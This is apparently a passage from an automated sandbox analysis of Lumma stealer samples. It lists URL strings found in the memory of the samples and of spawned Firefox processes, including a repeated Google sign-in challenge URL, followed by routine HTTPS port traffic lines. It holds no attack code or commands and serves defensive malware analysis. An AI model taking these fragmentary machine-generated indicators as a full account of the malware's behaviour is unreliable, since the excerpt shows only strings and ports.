Source: Lumma55.exe, 00000006.00000003.2576465014.0000000005728000.00000004.00000800.00020000.00000000.sdmp, Lumma55.exe, 00000006.00000003.2577839008.0000000005728000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 00000008.00000003.2638006118.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2830156182.000001DE00D3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2956659069.000001DE7F7AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2733836860.000001DE7F7B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2956659069.000001DE7F743000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2825914100.00000213323C9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2824054861.00000175A80E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: firefox.exe, 00000018.00000002.2828915424.000001DE00103000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2745992969.000001DE03B1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2746558271.000001DE03B77000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2746356946.000001DE03B5A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2828915424.000001DE0017C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2862035150.000001DE03F35000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2746175377.000001DE03B3C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: firefox.exe, 00000018.00000002.2830156182.000001DE00D3E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.de/
Source: firefox.exe, 00000018.00000002.2828915424.000001DE001DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2889518477.000001DE05FB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.avito.ru/
Source: firefox.exe, 00000018.00000002.2828915424.000001DE001DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2889518477.000001DE05FB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.baidu.com/
Source: firefox.exe, 00000018.00000002.2828915424.000001DE001DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2889518477.000001DE05FB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ctrip.com/
Source: Lumma55.exe, 00000006.00000003.2503075163.0000000005738000.00000004.00000800.00020000.00000000.sdmp, Lumma55.exe, 00000006.00000003.2502925594.000000000574F000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 00000008.00000003.2587667241.0000000005A8B000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 00000008.00000003.2587530351.0000000005A8D000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000003.2721841637.000000000550A000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000003.2721611289.000000000550C000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000003.2722108061.000000000550A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: Lumma55.exe, 00000006.00000003.2576465014.0000000005728000.00000004.00000800.00020000.00000000.sdmp, Lumma55.exe, 00000006.00000003.2576887838.000000000572D000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 00000008.00000003.2638006118.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2830156182.000001DE00D3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2956659069.000001DE7F7AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2733836860.000001DE7F7B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2956659069.000001DE7F743000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2825914100.00000213323C9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2824054861.00000175A80E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: firefox.exe, 00000018.00000002.2940438260.000001DE0C03D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2940438260.000001DE0C003000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: firefox.exe, 00000018.00000002.2945202858.000001DE0C32E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/
Source: firefox.exe, 00000018.00000002.2885513131.000001DE0593C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2811850812.000001DE0C11C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search
Source: firefox.exe, 00000018.00000002.2828915424.000001DE0017C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2746175377.000001DE03B3C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
Source: firefox.exe, 00000018.00000002.2885513131.000001DE0593C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/searchc50dcc87-0192-4461-bb88-17a55ba181c7d908d622-0387-4d36-8098-1a
Source: Lumma55.exe, 00000006.00000003.2503075163.0000000005738000.00000004.00000800.00020000.00000000.sdmp, Lumma55.exe, 00000006.00000003.2502925594.000000000574F000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 00000008.00000003.2587667241.0000000005A8B000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 00000008.00000003.2587530351.0000000005A8D000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000003.2721841637.000000000550A000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000003.2721611289.000000000550C000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000003.2722108061.000000000550A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: firefox.exe, 00000018.00000002.2828915424.000001DE00103000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/policies/privacy/
Source: firefox.exe, 00000018.00000002.2828915424.000001DE00103000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/policies/privacy/mozIGeckoMediaPluginChromeService
Source: firefox.exe, 00000018.00000002.2828915424.000001DE00103000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2745992969.000001DE03B1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2746558271.000001DE03B77000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2746356946.000001DE03B5A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2828915424.000001DE0017C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2862035150.000001DE03F35000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2746175377.000001DE03B3C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/geolocation/v1/geolocate?key=%GOOGLE_LOCATION_SERVICE_API_KEY%
Source: firefox.exe, 00000018.00000002.2828915424.000001DE001DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2889518477.000001DE05FB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ifeng.com/
Source: firefox.exe, 00000018.00000002.2828915424.000001DE001DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2889518477.000001DE05FB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.iqiyi.com/
Source: firefox.exe, 00000018.00000002.2836301934.000001DE01B2E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2823751134.0000002FB377C000.00000004.00000010.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2830156182.000001DE00D2C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2959855801.00000F9D02A04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2830156182.000001DE00DA0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/about/legal/terms/subscription-services/
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/releasenotes/?utm_source=firefox-browser&utm_medi
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/tour/
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/geolocation/
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/new?reason=manual-update
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/notes
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/set-as-default/thanks/
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/xr/
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/privacy/subscription-services/
Source: 8e3ce0163b.exe, 0000000A.00000003.2778334390.00000000055E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: 8e3ce0163b.exe, 0000000A.00000003.2778334390.00000000055E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: Lumma55.exe, 00000006.00000003.2553396479.0000000005841000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 00000008.00000003.2637585519.0000000005B6D000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000003.2778334390.00000000055E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: 8e3ce0163b.exe, 0000000A.00000003.2778334390.00000000055E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/android/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/ios/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campa
Source: firefox.exe, 00000018.00000002.2885513131.000001DE05915000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/new/
Source: firefox.exe, 00000018.00000002.2885513131.000001DE05915000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/new/resource://gre/modules/PlacesUtils.sys.mjsresource://gre/modules
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#crash-reporter
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#health-report
Source: firefox.exe, 00000018.00000002.2956659069.000001DE7F758000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2740656327.000001DE7F75F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2885513131.000001DE0593C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2825914100.00000213323C9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2824054861.00000175A80C7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: firefox.exe, 00000018.00000002.2885513131.000001DE0593C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2830156182.000001DE00D03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2956659069.000001DE7F743000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-content
Source: firefox.exe, 00000018.00000002.2940438260.000001DE0C073000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-contentP
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 00000018.00000002.2940438260.000001DE0C073000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/V
Source: Lumma55.exe, 00000006.00000003.2553396479.0000000005841000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 00000008.00000003.2637585519.0000000005B6D000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000003.2778334390.00000000055E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: firefox.exe, 00000018.00000002.2823751134.0000002FB377C000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.orgo
Source: firefox.exe, 00000018.00000002.2907746771.000001DE07293000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2885513131.000001DE0593C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2959734574.000002EE0A400000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com
Source: firefox.exe, 00000018.00000002.2940438260.000001DE0C003000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.olx.pl/
Source: firefox.exe, 00000018.00000002.2828915424.000001DE001AF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2828915424.000001DE00103000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2733518738.000001DE7F8C2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2957595100.000001DE7F8D5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.openh264.org/
Source: firefox.exe, 00000018.00000002.2828915424.000001DE00103000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.openh264.org/https://www.widevine.com/get
Source: firefox.exe, 00000018.00000002.2830156182.000001DE00D3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2956659069.000001DE7F743000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2959734574.000002EE0A400000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2880310530.000001DE05603000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.reddit.com/
Source: firefox.exe, 00000018.00000002.2828915424.000001DE00103000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.widevine.com/
Source: firefox.exe, 00000018.00000002.2889518477.000001DE05FB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2880310530.000001DE05603000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2824054861.00000175A8003000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: firefox.exe, 00000018.00000002.2828915424.000001DE001DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2889518477.000001DE05FB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2940438260.000001DE0C003000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.zhihu.com/
Source: firefox.exe, 00000018.00000002.2889518477.000001DE05F58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://xhr.spec.whatwg.org/#sync-warning
Source: firefox.exe, 00000018.00000002.2866748757.000001DE04360000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://xhr.spec.whatwg.org/#sync-warningThe
Source: firefox.exe, 00000018.00000002.2960896422.00002889A0204000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://yandex.com
Source: firefox.exe, 00000018.00000002.2883601667.000001DE05803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2885513131.000001DE0590B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2868599157.000001DE046BB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2959734574.000002EE0A400000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com
Source: firefox.exe, 00000018.00000002.2921111201.000001DE073A7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2890541633.000001DE06003000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2881732812.000001DE05746000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/
Source: firefox.exe, 00000018.00000002.2881732812.000001DE05703000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/PC
Source: firefox.exe, 00000018.00000002.2885513131.000001DE0593C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2885513131.000001DE05915000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account
Source: firefox.exe, 00000018.00000002.2885513131.000001DE05915000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account.panel-header
Source: firefox.exe, 00000018.00000002.2954557391.000001DE74011000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2885513131.000001DE05915000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2828915424.000001DE0017C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828598435.0000021332424000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2825165898.00000213320CA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823819351.00000175A7FF4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2822545062.00000175A7DAA000.00000004.00000020.00020000.00000000.sdmp, 67baab2438.exe, 0000001E.00000002.2965543678.0000000001888000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 00000016.00000002.2725613471.00000270490E7000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2733567847.0000014287560000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2949489881.000001DE73BE9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser
Source: firefox.exe, 00000018.00000002.2949489881.000001DE73BE9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd?9
Source: firefox.exe, 00000018.00000002.2955186116.000001DE75BE0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2825165898.00000213320C0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828598435.0000021332424000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2822545062.00000175A7DA0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823819351.00000175A7FF4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdMOZ_CRASHREPORTER_RE
Source: firefox.exe, 00000018.00000002.2828915424.000001DE001DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdgetCanApplyUpdates
Source: firefox.exe, 00000018.00000002.2885513131.000001DE05915000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdhttps://youtube.com/
Source: firefox.exe, 00000018.00000002.2828915424.000001DE0017C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdmoz-extension://31bc
Source: firefox.exe, 00000018.00000002.2828915424.000001DE001DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdor
Source: firefox.exe, 00000018.00000002.2885513131.000001DE0593C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/accountbing
Source: firefox.exe, 00000018.00000002.2962668658.00003B5345100000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.comES;
Source: firefox.exe, 00000018.00000002.2962668658.00003B5345100000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.comES;Z
Source: firefox.exe, 00000018.00000002.2885513131.000001DE0590B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.comLOAD_FLAGS_USER_ACTIVATION
Source: firefox.exe, 00000018.00000002.2885513131.000001DE0590B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.comLOAD_FLAGS_USER_ACTIVATIONdocument-element-insertedfeatureUpdate:majorRelease2022
Source: firefox.exe, 00000018.00000002.2885513131.000001DE0590B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.comdocument-element-insertedLOAD_FLAGS_FORCE_ALLOW_COOKIESdocument-element-insertedd
Source: firefox.exe, 00000018.00000002.2885513131.000001DE0590B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.comdocument-element-inserteddocument-element-insertedgetRegisteredCssHighlightsgetSu
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49986
Source: unknown Network traffic detected: HTTP traffic on port 50042 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50059 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50059
Source: unknown Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50061
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50060
Source: unknown Network traffic detected: HTTP traffic on port 50045 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown Network traffic detected: HTTP traffic on port 49906 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown Network traffic detected: HTTP traffic on port 50060 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50064
Source: unknown Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49909 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49969
Source: unknown Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49930 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49892 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49986 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown Network traffic detected: HTTP traffic on port 50043 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49887 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49952
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50006
Source: unknown Network traffic detected: HTTP traffic on port 50012 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown Network traffic detected: HTTP traffic on port 49952 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49969 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49994 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown Network traffic detected: HTTP traffic on port 49853 -> 443
